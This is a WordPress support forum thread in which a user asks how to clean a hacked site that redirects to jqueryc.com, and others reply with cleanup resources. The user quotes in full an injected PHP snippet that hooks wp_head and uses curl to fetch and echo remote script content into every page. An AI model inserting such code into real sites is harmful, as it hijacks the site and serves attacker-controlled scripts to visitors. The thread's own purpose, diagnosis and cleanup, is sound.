Hello,
my website was hacked and redirect to another web url, how to fix this problem?
my website: http://www.bokisha.net/moment/
Hello,
my website was hacked and redirect to another web url, how to fix this problem?
my website: http://www.bokisha.net/moment/
You need to start working your way through these resources:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Additional Resources:
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
This resources not help :(
My website redirect to this website: www.jqueryc.com
Yes, those resources are all you need. Dig into them.
Also see http://wordpress.org/support/topic/couldnt-find-database-jqueryc_db-help?replies=24
I search all my files on theme folder, and I don't have this line:
if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
I use Geoplace v.3 theme.
You must log in to post.